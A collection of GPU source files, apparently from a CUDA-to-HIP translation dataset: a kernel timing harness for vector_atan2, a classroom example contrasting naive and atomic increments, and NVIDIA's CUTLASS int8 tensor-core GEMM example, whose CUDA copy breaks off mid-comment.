#include <stdbool.h> #include <stdio.h> #include <string.h> #include <getopt.h> #include <curand_kernel.h> #include <stdlib.h> #include <cuda.h> #include <sys/time.h> #include "vector_atan2.cu" #include<chrono> #include<iostream> using namespace std; using namespace std::chrono; int blocks_[20][2] = {{8,8},{16,16},{24,24},{32,32},{1,64},{1,128},{1,192},{1,256},{1,320},{1,384},{1,448},{1,512},{1,576},{1,640},{1,704},{1,768},{1,832},{1,896},{1,960},{1,1024}}; int matrices_[7][2] = {{240,240},{496,496},{784,784},{1016,1016},{1232,1232},{1680,1680},{2024,2024}}; int main(int argc, char **argv) { cudaSetDevice(0); char* p;int matrix_len=strtol(argv[1], &p, 10); for(int matrix_looper=0;matrix_looper<matrix_len;matrix_looper++){ for(int block_looper=0;block_looper<20;block_looper++){ int XSIZE=matrices_[matrix_looper][0],YSIZE=matrices_[matrix_looper][1],BLOCKX=blocks_[block_looper][0],BLOCKY=blocks_[block_looper][1]; const int n = 1; const REAL *x = NULL; cudaMalloc(&x, XSIZE*YSIZE); const int offset_x = 1; const int stride_x = 1; const REAL *y = NULL; cudaMalloc(&y, XSIZE*YSIZE); const int offset_y = 1; const int stride_y = 1; REAL *z = NULL; cudaMalloc(&z, XSIZE*YSIZE); const int offset_z = 1; const int stride_z = 1; int iXSIZE= XSIZE; int iYSIZE= YSIZE; while(iXSIZE%BLOCKX!=0) { iXSIZE++; } while(iYSIZE%BLOCKY!=0) { iYSIZE++; } dim3 gridBlock(iXSIZE/BLOCKX, iYSIZE/BLOCKY); dim3 threadBlock(BLOCKX, BLOCKY); cudaFree(0); vector_atan2<<<gridBlock,threadBlock>>>(n,x,offset_x,stride_x,y,offset_y,stride_y,z,offset_z,stride_z); cudaDeviceSynchronize(); for (int loop_counter = 0; loop_counter < 10; ++loop_counter) { vector_atan2<<<gridBlock,threadBlock>>>(n,x,offset_x,stride_x,y,offset_y,stride_y,z,offset_z,stride_z); } auto start = steady_clock::now(); for (int loop_counter = 0; loop_counter < 1000; loop_counter++) { vector_atan2<<<gridBlock,threadBlock>>>(n,x,offset_x,stride_x,y,offset_y,stride_y,z,offset_z,stride_z); } auto end = steady_clock::now(); auto usecs = duration_cast<duration<float, microseconds::period> >(end - start); cout <<'['<<usecs.count()<<','<<'('<<BLOCKX<<','<<BLOCKY<<')' << ','<<'('<<XSIZE<<','<<YSIZE<<')'<<']' << endl; } }}
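One caveat about the benchmark harness above (both versions): kernel launches are asynchronous, so wrapping the launch loop in std::chrono timestamps without a device synchronization before the final clock read mostly measures launch overhead rather than kernel execution. A hedged alternative is sketched below as a small self-contained helper; timeKernelBurstMs is an illustrative name, and the HIP twin would simply use hipDeviceSynchronize.

#include <chrono>
#include <cuda_runtime.h>

// Time a burst of kernel launches, synchronizing so the interval covers execution,
// not just the (asynchronous) launch calls. Sketch only, not part of the original harness.
template <typename LaunchFn>
float timeKernelBurstMs(LaunchFn launch, int iterations)
{
    cudaDeviceSynchronize();                              // drain any prior work
    auto start = std::chrono::steady_clock::now();
    for (int i = 0; i < iterations; ++i)
        launch();                                         // enqueue one kernel launch
    cudaDeviceSynchronize();                              // wait for the whole burst to finish
    auto end = std::chrono::steady_clock::now();
    return std::chrono::duration<float, std::milli>(end - start).count();
}

In the file above it could wrap the existing launch, for example timeKernelBurstMs([&]{ vector_atan2<<<gridBlock, threadBlock>>>(n, x, offset_x, stride_x, y, offset_y, stride_y, z, offset_z, stride_z); }, 1000).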
967448877ab1326b91fb569940f37db69888ad73.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include <stdio.h> #include "gputimer.h" #define NUM_THREADS 10000000 #define ARRAY_SIZE 100 #define BLOCK_WIDTH 1000 void print_array(int *array, int size) { printf("{ "); for (int i = 0; i < size; i++) { printf("%d ", array[i]); } printf("}\n"); } __global__ void increment_naive(int *g) { // which thread is this? int i = blockIdx.x * blockDim.x + threadIdx.x; // each thread to increment consecutive elements, wrapping at ARRAY_SIZE i = i % ARRAY_SIZE; g[i] = g[i] + 1; } __global__ void increment_atomic(int *g) { // which thread is this? int i = blockIdx.x * blockDim.x + threadIdx.x; // each thread to increment consecutive elements, wrapping at ARRAY_SIZE i = i % ARRAY_SIZE; atomicAdd(& g[i], 1); } int main(int argc,char **argv) { GpuTimer timer; printf("%d total threads in %d blocks writing into %d array elements\n", NUM_THREADS, NUM_THREADS / BLOCK_WIDTH, ARRAY_SIZE); // declare and allocate host memory int h_array[ARRAY_SIZE]; const int ARRAY_BYTES = ARRAY_SIZE * sizeof(int); // declare, allocate, and zero out GPU memory int * d_array; hipMalloc((void **) &d_array, ARRAY_BYTES); hipMemset((void *) d_array, 0, ARRAY_BYTES); // launch the kernel - comment out one of these timer.Start(); // Instructions: This program is needed for the next quiz // uncomment increment_naive to measure speed and accuracy // of non-atomic increments or uncomment increment_atomic to // measure speed and accuracy of atomic icrements // increment_naive<<<NUM_THREADS/BLOCK_WIDTH, BLOCK_WIDTH>>>(d_array); hipLaunchKernelGGL(( increment_atomic), dim3(NUM_THREADS/BLOCK_WIDTH), dim3(BLOCK_WIDTH), 0, 0, d_array); timer.Stop(); // copy back the array of sums from GPU and print hipMemcpy(h_array, d_array, ARRAY_BYTES, hipMemcpyDeviceToHost); print_array(h_array, ARRAY_SIZE); printf("Time elapsed = %g ms\n", timer.Elapsed()); // free GPU memory allocation and exit hipFree(d_array); return 0; }
967448877ab1326b91fb569940f37db69888ad73.cu
#include <stdio.h> #include "gputimer.h" #define NUM_THREADS 10000000 #define ARRAY_SIZE 100 #define BLOCK_WIDTH 1000 void print_array(int *array, int size) { printf("{ "); for (int i = 0; i < size; i++) { printf("%d ", array[i]); } printf("}\n"); } __global__ void increment_naive(int *g) { // which thread is this? int i = blockIdx.x * blockDim.x + threadIdx.x; // each thread to increment consecutive elements, wrapping at ARRAY_SIZE i = i % ARRAY_SIZE; g[i] = g[i] + 1; } __global__ void increment_atomic(int *g) { // which thread is this? int i = blockIdx.x * blockDim.x + threadIdx.x; // each thread to increment consecutive elements, wrapping at ARRAY_SIZE i = i % ARRAY_SIZE; atomicAdd(& g[i], 1); } int main(int argc,char **argv) { GpuTimer timer; printf("%d total threads in %d blocks writing into %d array elements\n", NUM_THREADS, NUM_THREADS / BLOCK_WIDTH, ARRAY_SIZE); // declare and allocate host memory int h_array[ARRAY_SIZE]; const int ARRAY_BYTES = ARRAY_SIZE * sizeof(int); // declare, allocate, and zero out GPU memory int * d_array; cudaMalloc((void **) &d_array, ARRAY_BYTES); cudaMemset((void *) d_array, 0, ARRAY_BYTES); // launch the kernel - comment out one of these timer.Start(); // Instructions: This program is needed for the next quiz // uncomment increment_naive to measure speed and accuracy // of non-atomic increments or uncomment increment_atomic to // measure speed and accuracy of atomic icrements // increment_naive<<<NUM_THREADS/BLOCK_WIDTH, BLOCK_WIDTH>>>(d_array); increment_atomic<<<NUM_THREADS/BLOCK_WIDTH, BLOCK_WIDTH>>>(d_array); timer.Stop(); // copy back the array of sums from GPU and print cudaMemcpy(h_array, d_array, ARRAY_BYTES, cudaMemcpyDeviceToHost); print_array(h_array, ARRAY_SIZE); printf("Time elapsed = %g ms\n", timer.Elapsed()); // free GPU memory allocation and exit cudaFree(d_array); return 0; }
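The example above contrasts increment_naive with increment_atomic: 10,000,000 threads fold onto 100 counters, so with atomics every element of h_array should come back as exactly NUM_THREADS / ARRAY_SIZE, while the naive kernel loses most updates to write-after-write races. The small check below makes that expectation explicit; checkResult is an illustrative helper, not part of the original exercise.

#include <cstdio>

// With num_threads increments wrapped onto array_size counters, the atomic kernel
// should leave every element equal to num_threads / array_size (sketch, not original code).
bool checkResult(const int *h_array, int array_size, int num_threads)
{
    const int expected = num_threads / array_size;        // 10,000,000 / 100 = 100,000
    for (int i = 0; i < array_size; i++) {
        if (h_array[i] != expected) {
            printf("element %d is %d, expected %d\n", i, h_array[i], expected);
            return false;                                  // the typical outcome for increment_naive
        }
    }
    return true;
}

Calling checkResult(h_array, ARRAY_SIZE, NUM_THREADS) after the device-to-host copy returns true for the atomic kernel and, in practice, false for the naive one.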
40d62aa757359add2ad6e1bb4d8638e631df0be3.hip
// !!! This is a file automatically generated by hipify!!! /*************************************************************************************************** * Copyright (c) 2017-2019, NVIDIA CORPORATION. All rights reserved. * * Redistribution and use in source and binary forms, with or without modification, are permitted * provided that the following conditions are met: * * Redistributions of source code must retain the above copyright notice, this list of * conditions and the following disclaimer. * * Redistributions in binary form must reproduce the above copyright notice, this list of * conditions and the following disclaimer in the documentation and/or other materials * provided with the distribution. * * Neither the name of the NVIDIA CORPORATION nor the names of its contributors may be used * to endorse or promote products derived from this software without specific prior written * permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND * FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL NVIDIA CORPORATION BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, * STRICT LIABILITY, OR TOR (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. * **************************************************************************************************/ /** This example shows how to run matrix multiplication kernels using functions and data structures provided by CUTLASS using tensor cores; which we run on a NVIDIA Turing GPU. Writing a single high performance matrix multiplication kernel is hard but do-able. Whereas writing high performance kernels at scale which works for multiple problem sizes with good abstractions is really hard. CUTLASS solves this problem by providing simplified abstractions (knobs) to compose multiple sections of gemm kernel. When used properly, the kernels can hit peak performance of GPU easily. CUTLASS divides a kernel into hierarchical composable sections. Which means, at each thread, warp and thread-block level, they compute on their own tile-size with higher level of tile sizes being composed from lower level ones. Multiple thread-tiles (tile size each thread computes) can be used to form warp-tiles (tile size each warp computes) and multiple warp tiles can be used to compute threadblock-tile (tile size computed by a threadblock). In thie example, we split variable initialization into 1. Setting up data properties : describes how matrices are laid out in the memory and how the kernel can view them (logical to physical mapping) 2. Setting up computation properties : describes how the above set matrices will be used to compute output of matrix multiplication. First, we setup the data types of matrices A, B, C and D along with alpha, beta as the equation for GEMM is D = alpha * A * B + beta * C. In CUTLASS, the kernels first compute A * B and leaves the rest of the computation to end of the kernel as alpha * X + beta * C is a simple element-wise operation on X (A * B) and C. We call this as epilogue of kernel. 
Hence, we set up the data types for alpha and beta to be equal to ElementComputeEpilogue = int32_t.
As we want to use MMA instructions on Turing, and they support 8-bit signed integers (int8_t), we use
int8_t as the data type for the elements of input matrices A and B. Turing also supports accumulation
of the partial dot products into int32_t, which can store a wider range of numbers, so we use int32_t
as the data type of the output matrix elements and of the accumulator. We convey this to the CUTLASS
kernel by initializing the template variables ElementAccumulator (int32_t), ElementComputeEpilogue
(int32_t), ElementInputA (int8_t), ElementInputB (int8_t) and ElementOutput (int32_t).

Communicating just the data types is not enough. As the data is laid out linearly in memory, we also
have to convey the layout of the matrices. We do that by initializing the template variable
LayoutInputA to a column-major CUTLASS layout, LayoutInputB to row-major and LayoutOutput to
row-major.

Next, we set up the rules to compute alpha * X + beta * C, which is called the epilogue of the kernel.
We initialize the template variable EpilogueOp, which takes the data type of the output ElementOutput
(int32_t), the number of elements per vectorized memory access (128 bits, i.e. 4 int32_t elements),
the data type of the accumulator (int32_t) and the data type used to compute the linear combination
(alpha * X + beta * C).

Now that we have set up the properties of the data, we have to set up the properties of the
computation.

Second, we create template variables for the tile sizes computed by a thread-block, a warp and a
single MMA op: 128x256x64, 64x64x16 and 8x8x16 (MxNxK) respectively. When these are passed to
instantiate the CUTLASS GEMM kernel, it internally deduces the number of threads needed per
thread-block, the amount of shared memory, how to store data in a bank-conflict-free manner, and a
ton of other variables required to compose, initialize and launch a high performance GEMM kernel.
This is the beauty of CUTLASS: it relieves the developer from understanding and coding complicated
hardware optimizations, which can easily go wrong.

CUTLASS also supports multiple MMA pipelines in a threadblock. What are MMA pipelines? An MMA
pipeline covers the whole process of loading input data from global memory to shared memory, loading
data from shared memory to registers, doing the matrix multiplication and storing to global memory.
The flow sequence below shows a typical MMA pipeline.

matrix in global memory -> registers -> tile in shared memory -> registers -> mma -> registers ->
output to global memory

The problem with a single pipeline is that each stage is synchronous, which means each stage has to
wait until the previous one has finished executing. Some stages in the pipeline do not have a fixed
latency, for example the loads from global memory and shared memory. Therefore, we can add one more
pipeline with a phase shift in the MMA kernel to hide the latency of the global and shared memory
loads. Finally, the pipelines in a kernel look like

(1) matrix in global memory -> (2) registers -> (3) tile in shared memory -> (4) registers ->
(5) mma -> (6) registers -> (7) output to global memory

(1) <null> -> (2) <null> -> (3) matrix in global memory -> (4) registers -> (5) tile in shared
memory -> (6) registers -> (7) mma -> (8) registers -> (9) output to global memory

This way, you can hide the latency of the second global memory load by doing computation on input
data that has already been loaded.

There are a few more template variables to initialize, such as which threadblock tile of the output
matrix is computed by which launched threadblock, and the CUDA SM architecture of the GPU you want
to run on.
These are all put together to create a template variable which describes CUTLASS GEMM kernel using cutlass::gemm::device::Gemm template. The next step is to intialize physical data, instantiate and initialize CUTLASS kernel and run it. We use CUTLASS utilities to initialize, fill, compare matrices as they are simple and doesn't come in the way of learning CUTLASS. Once all the matrices are initialized and filled with data, create arguments tuple to launch CUTLASS kernel which takes problem size (M = 5120, N = 4096 and K = 4096), matrices, alpha, beta and the important one, split k-dimension factor. Along with that, we query CUTLASS if any scratch-space memory required by the kernel we instantiated. If yes, we create it and pass it along with other arguments created to intialize CUTLASS kernel then, the kernel is launched. In this example, we later on launch a reference gemm kernel (from CUTLASS utilities) to compare if the output from CUTLASS kernel is same as reference GEMM kernel. */ #include <iostream> #include "cutlass/cutlass.h" #include "cutlass/gemm/device/gemm.h" #include "cutlass/util/host_tensor.h" #include "cutlass/util/reference/device/gemm.h" #include "cutlass/util/reference/host/tensor_compare.h" #include "cutlass/util/reference/host/tensor_copy.h" #include "cutlass/util/reference/host/tensor_fill.h" #include "cutlass/util/tensor_view_io.h" #include "helper.h" // The code section below describes datatype for input, output matrices and computation between // elements in input matrices. using ElementAccumulator = int32_t; // <- data type of accumulator using ElementComputeEpilogue = ElementAccumulator; // <- data type of epilogue operations using ElementInputA = int8_t; // <- data type of elements in input matrix A using ElementInputB = int8_t; // <- data type of elements in input matrix B using ElementOutput = int32_t; // <- data type of elements in output matrix D // The code section below describes matrix layout of input and output matrices. Column Major for // Matrix A, Row Major for Matrix B and Row Major for Matrix C using LayoutInputA = cutlass::layout::RowMajor; using LayoutInputB = cutlass::layout::ColumnMajor; using LayoutOutput = cutlass::layout::RowMajor; // This code section describes whether you want to use tensor cores or regular SIMT cores on GPU SM using MMAOp = cutlass::arch::OpClassTensorOp; // This code section describes CUDA SM architecture number using SmArch = cutlass::arch::Sm75; // This code section describes the tile size a thread block will compute using ShapeMMAThreadBlock = cutlass::gemm::GemmShape<128, 256, 64>; // <- threadblock tile M = 128, N = 256, K = 64 // This code section describes tile size a warp will compute using ShapeMMAWarp = cutlass::gemm::GemmShape<64, 64, 64>; // <- warp tile M = 64, N = 64, K = 16 // This code section describes the size of MMA op using ShapeMMAOp = cutlass::gemm::GemmShape<8, 8, 16>; // <- MMA Op tile M = 8, N = 8, K = 16 // This code section describes how threadblocks are scheduled on GPU using SwizzleThreadBlock = cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle; // <- ?? // This code section describes the epilogue part of the kernel using EpilogueOp = cutlass::epilogue::thread::LinearCombination< ElementOutput, // <- data type of output matrix 128 / cutlass::sizeof_bits<ElementOutput>::value, // <- the number of elements per vectorized // memory access. For a byte, it's 16 // elements. 
This becomes the vector width of // math instructions in the epilogue too ElementAccumulator, // <- data type of accumulator ElementComputeEpilogue>; // <- data type for alpha/beta in linear combination function // Number of pipelines you want to use constexpr int NumStages = 2; using Gemm = cutlass::gemm::device::Gemm<ElementInputA, LayoutInputA, ElementInputB, LayoutInputB, ElementOutput, LayoutOutput, ElementAccumulator, MMAOp, SmArch, ShapeMMAThreadBlock, ShapeMMAWarp, ShapeMMAOp, EpilogueOp, SwizzleThreadBlock, NumStages>; int main() { hipDeviceProp_t props; CUDA_CHECK(hipGetDeviceProperties(&props, 0)); if (!(props.major >= 7 && props.minor >= 5)) { std::cerr << "Turing Tensor Ops must be run on a machine with compute capability at least 75." << std::endl; return 0; } const int length_m = 5120; const int length_n = 4096; const int length_k = 4096; // Create a tuple of problem size for matrix multiplication cutlass::gemm::GemmCoord problem_size(length_m, length_n, length_k); // Initialize tensors using CUTLASS helper functions cutlass::HostTensor<ElementInputA, LayoutInputA> tensor_a( problem_size.mk()); // <- Create matrix A with dimensions M x K cutlass::HostTensor<ElementInputB, LayoutInputB> tensor_b( problem_size.nk()); // <- Create matrix B with dimensions N x K cutlass::HostTensor<ElementOutput, LayoutOutput> tensor_c( problem_size.mn()); // <- Create matrix C with dimensions M x N cutlass::HostTensor<ElementOutput, LayoutOutput> tensor_d( problem_size.mn()); // <- Create matrix D with dimensions M x N used to store output from // CUTLASS kernel cutlass::HostTensor<ElementOutput, LayoutOutput> tensor_ref_d( problem_size.mn()); // <- Create matrix D with dimensions M x N used to store output from // reference kernel // Fill input and output matrices on host using CUTLASS helper functions cutlass::reference::host::TensorFillRandomUniform( tensor_a.host_view(), 1, ElementInputA(4), ElementInputA(-4), 0); // <- Fill matrix A on host with uniform-distribution random data cutlass::reference::host::TensorFillRandomUniform( tensor_b.host_view(), 1, ElementInputB(4), ElementInputB(-4), 0); // <- Fill matrix B on host with uniform-distribution random data cutlass::reference::host::TensorFillRandomUniform( tensor_c.host_view(), 1, ElementOutput(4), ElementOutput(-4), 0); // <- Fill matrix C on host with uniform-distribution random data cutlass::reference::host::TensorFill( tensor_d.host_view()); // <- fill matrix D on host with zeros cutlass::reference::host::TensorFill( tensor_ref_d.host_view()); // <- fill matrix D for reference on host with zeros // Copy data from host to GPU tensor_a.sync_device(); tensor_b.sync_device(); tensor_c.sync_device(); tensor_d.sync_device(); tensor_ref_d.sync_device(); // Initialize alpha and beta for dot product computation ElementComputeEpilogue alpha = ElementComputeEpilogue(1); ElementComputeEpilogue beta = ElementComputeEpilogue(0); // Split K dimension into 1 partitions int split_k_slices = 1; // Create a tuple of gemm kernel arguments. 
This is later passed as arguments to launch // instantiated CUTLASS kernel typename Gemm::Arguments arguments{problem_size, // <- problem size of matrix multiplication tensor_a.device_ref(), // <- reference to matrix A on device tensor_b.device_ref(), // <- reference to matrix B on device tensor_c.device_ref(), // <- reference to matrix C on device tensor_d.device_ref(), // <- reference to matrix D on device {alpha, beta}, // <- tuple of alpha and beta split_k_slices}; // <- k-dimension split factor // Using the arguments, query for extra workspace required for matrix multiplication computation size_t workspace_size = Gemm::get_workspace_size(arguments); // Allocate workspace memory cutlass::device_memory::allocation<uint8_t> workspace(workspace_size); // Instantiate CUTLASS kernel depending on templates Gemm gemm_op; // Initialize CUTLASS kernel with arguments and workspace pointer cutlass::Status status = gemm_op.initialize(arguments, workspace.get()); CUTLASS_CHECK(status); // Launch initialized CUTLASS kernel status = gemm_op(); CUTLASS_CHECK(status); // Create instantiation for device reference gemm kernel cutlass::reference::device::Gemm<ElementInputA, LayoutInputA, ElementInputB, LayoutInputB, ElementOutput, LayoutOutput, ElementComputeEpilogue, ElementComputeEpilogue> gemm_device; // Launch device reference gemm kernel gemm_device(problem_size, alpha, tensor_a.device_ref(), tensor_b.device_ref(), beta, tensor_c.device_ref(), tensor_ref_d.device_ref()); // Wait for kernels to finish hipDeviceSynchronize(); // Copy output data from CUTLASS and reference kernel to host for comparison tensor_d.sync_host(); tensor_ref_d.sync_host(); // Check if output from CUTLASS kernel and reference kernel are equal or not std::cout << (cutlass::reference::host::TensorEquals(tensor_d.host_view(), tensor_ref_d.host_view()) ? "Passed" : "Failed") << std::endl; CUTLASS_CHECK(status); return 0; }
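To spell out the arithmetic described in the comments above, the sketch below is a hypothetical host-side reference for D = alpha * (A * B) + beta * C with int8_t inputs and int32_t accumulation. It is not taken from the example and it simplifies the layouts to plain row-major arrays; it only illustrates the product plus linear-combination epilogue that the CUTLASS kernel computes.

#include <cstdint>
#include <vector>

// Reference GEMM with epilogue: D = alpha * (A * B) + beta * C.
// A is M x K, B is K x N, C and D are M x N, all row-major in this sketch
// (the CUTLASS example itself mixes row-major and column-major layouts).
void reference_gemm_s8_s32(int M, int N, int K, int32_t alpha,
                           const std::vector<int8_t>& A,
                           const std::vector<int8_t>& B,
                           int32_t beta,
                           const std::vector<int32_t>& C,
                           std::vector<int32_t>& D) {
  for (int m = 0; m < M; ++m) {
    for (int n = 0; n < N; ++n) {
      int32_t acc = 0;  // partial dot products accumulate in int32_t
      for (int k = 0; k < K; ++k) {
        acc += static_cast<int32_t>(A[m * K + k]) * static_cast<int32_t>(B[k * N + n]);
      }
      // Epilogue: element-wise linear combination of the accumulator and C.
      D[m * N + n] = alpha * acc + beta * C[m * N + n];
    }
  }
}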
40d62aa757359add2ad6e1bb4d8638e631df0be3.cu
/*************************************************************************************************** * Copyright (c) 2017-2019, NVIDIA CORPORATION. All rights reserved. * * Redistribution and use in source and binary forms, with or without modification, are permitted * provided that the following conditions are met: * * Redistributions of source code must retain the above copyright notice, this list of * conditions and the following disclaimer. * * Redistributions in binary form must reproduce the above copyright notice, this list of * conditions and the following disclaimer in the documentation and/or other materials * provided with the distribution. * * Neither the name of the NVIDIA CORPORATION nor the names of its contributors may be used * to endorse or promote products derived from this software without specific prior written * permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND * FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL NVIDIA CORPORATION BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, * STRICT LIABILITY, OR TOR (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. * **************************************************************************************************/ /** This example shows how to run matrix multiplication kernels using functions and data structures provided by CUTLASS using tensor cores; which we run on a NVIDIA Turing GPU. Writing a single high performance matrix multiplication kernel is hard but do-able. Whereas writing high performance kernels at scale which works for multiple problem sizes with good abstractions is really hard. CUTLASS solves this problem by providing simplified abstractions (knobs) to compose multiple sections of gemm kernel. When used properly, the kernels can hit peak performance of GPU easily. CUTLASS divides a kernel into hierarchical composable sections. Which means, at each thread, warp and thread-block level, they compute on their own tile-size with higher level of tile sizes being composed from lower level ones. Multiple thread-tiles (tile size each thread computes) can be used to form warp-tiles (tile size each warp computes) and multiple warp tiles can be used to compute threadblock-tile (tile size computed by a threadblock). In thie example, we split variable initialization into 1. Setting up data properties : describes how matrices are laid out in the memory and how the kernel can view them (logical to physical mapping) 2. Setting up computation properties : describes how the above set matrices will be used to compute output of matrix multiplication. First, we setup the data types of matrices A, B, C and D along with alpha, beta as the equation for GEMM is D = alpha * A * B + beta * C. In CUTLASS, the kernels first compute A * B and leaves the rest of the computation to end of the kernel as alpha * X + beta * C is a simple element-wise operation on X (A * B) and C. We call this as epilogue of kernel. Hence, we setup data types for alpha and beta to be equal to ElementComputeEpilogue = int32_t. 
As we want to use MMA instructions on Turing and they support 8-bit signed integer (int8_t), we use data type for elements in input matrix A and B as int8_t. Volta also supports accumulation of partial dot product to int32_t, which can store wider range of numbers, we use it as data type of output matrix elements and accumulation. We convey this to CUTLASS kernel by initializing template variables ElementAccumulator (int32_t), ElementComputeEpilogue (int32_t), ElementInputA (int8_t), ElementInputB (int8_t), ElementOutput (int32_t). Communicating just the data type is not enough. As the data is laid out linearly in memory, we have to convey the layout of matrices. We do that by initializing template variable LayoutInputA to column major cutlass variable, LayoutInputB to row major and LayoutOutput to row major. Next, we setup rules to comptue alpha * X + beta * C which is called epilogue of the kernel. We initialize template variable EpilogueOp, which takes the data type of output ElementOutput (int32_t), the number of elements per vector memory access (16), data type of accumulator (int32_t) and data type of computation of linear combination (alpha * X + beta * C). Now that we setup the properties of data, we have to setup properties of computation. Second, we create template variables of tile sizes for thread-block, warp and mma-op to 128x256x64, 64x64x16, 8x8x16 (MxNxK) respectively. When passed to instantiate CUTLASS GEMM kernel, it internally deduce the amount of threads needed per thread-block, amount of shared memory, storing data in bank-conflict free manner, and ton of other variables required to compose, intialize and launch a high performance GEMM kernel. This is the beauty of CUTLASS, it relieves developer from understanding and coding complicated hardware optimizations which can easily go wrong. CUTLASS also supports multiple MMA pipelines in a threadblock. What are MMA pipelines? MMA pipelines constitute the whole process of loading input data from global memory to shared memory, loading data from shared memory to registers, doing matrix multiplication, store to global memory. The below flow sequence shows a typical mma pipeline. matrix in global memory -> registers -> tile in shared memory -> registers -> mma -> registers -> output to global memory The problem with single pipeline is, each stage is synchronous which means, each stage has to wait until the previous finished executing. There are stages in the pipeline which do not have fixed latency, for example, the loads from global memory and shared memory. Therefore, we can add one more pipeline with a phase shift in mma kernel to hide latency from global and shared memory loads. Finally, the pipeline in a kernel looks like (1) matrix in global memory -> (2) registers -> (3) tile in shared memory -> (4) registers -> (5) mma -> (6) registers -> (7) output to global memory (1) <null> -> (2) <null> -> (3) matrix in global memory -> (4) registers -> (5) tile in shared memory -> (6) registers -> (7) mma -> (8) registers -> (9) output to global memory This way, you can hide the second global memoroy load latency by doing computation on already loaded input data. There are few more template variables initialized such as, which threadblock tile of output matrix is done which threadblock launched on an SM, CUDA SM architecture of GPU you want to run on. These are all put together to create a template variable which describes CUTLASS GEMM kernel using cutlass::gemm::device::Gemm template. 
The next step is to intialize physical data, instantiate and initialize CUTLASS kernel and run it. We use CUTLASS utilities to initialize, fill, compare matrices as they are simple and doesn't come in the way of learning CUTLASS. Once all the matrices are initialized and filled with data, create arguments tuple to launch CUTLASS kernel which takes problem size (M = 5120, N = 4096 and K = 4096), matrices, alpha, beta and the important one, split k-dimension factor. Along with that, we query CUTLASS if any scratch-space memory required by the kernel we instantiated. If yes, we create it and pass it along with other arguments created to intialize CUTLASS kernel then, the kernel is launched. In this example, we later on launch a reference gemm kernel (from CUTLASS utilities) to compare if the output from CUTLASS kernel is same as reference GEMM kernel. */ #include <iostream> #include "cutlass/cutlass.h" #include "cutlass/gemm/device/gemm.h" #include "cutlass/util/host_tensor.h" #include "cutlass/util/reference/device/gemm.h" #include "cutlass/util/reference/host/tensor_compare.h" #include "cutlass/util/reference/host/tensor_copy.h" #include "cutlass/util/reference/host/tensor_fill.h" #include "cutlass/util/tensor_view_io.h" #include "helper.h" // The code section below describes datatype for input, output matrices and computation between // elements in input matrices. using ElementAccumulator = int32_t; // <- data type of accumulator using ElementComputeEpilogue = ElementAccumulator; // <- data type of epilogue operations using ElementInputA = int8_t; // <- data type of elements in input matrix A using ElementInputB = int8_t; // <- data type of elements in input matrix B using ElementOutput = int32_t; // <- data type of elements in output matrix D // The code section below describes matrix layout of input and output matrices. Column Major for // Matrix A, Row Major for Matrix B and Row Major for Matrix C using LayoutInputA = cutlass::layout::RowMajor; using LayoutInputB = cutlass::layout::ColumnMajor; using LayoutOutput = cutlass::layout::RowMajor; // This code section describes whether you want to use tensor cores or regular SIMT cores on GPU SM using MMAOp = cutlass::arch::OpClassTensorOp; // This code section describes CUDA SM architecture number using SmArch = cutlass::arch::Sm75; // This code section describes the tile size a thread block will compute using ShapeMMAThreadBlock = cutlass::gemm::GemmShape<128, 256, 64>; // <- threadblock tile M = 128, N = 256, K = 64 // This code section describes tile size a warp will compute using ShapeMMAWarp = cutlass::gemm::GemmShape<64, 64, 64>; // <- warp tile M = 64, N = 64, K = 16 // This code section describes the size of MMA op using ShapeMMAOp = cutlass::gemm::GemmShape<8, 8, 16>; // <- MMA Op tile M = 8, N = 8, K = 16 // This code section describes how threadblocks are scheduled on GPU using SwizzleThreadBlock = cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle; // <- ?? // This code section describes the epilogue part of the kernel using EpilogueOp = cutlass::epilogue::thread::LinearCombination< ElementOutput, // <- data type of output matrix 128 / cutlass::sizeof_bits<ElementOutput>::value, // <- the number of elements per vectorized // memory access. For a byte, it's 16 // elements. 
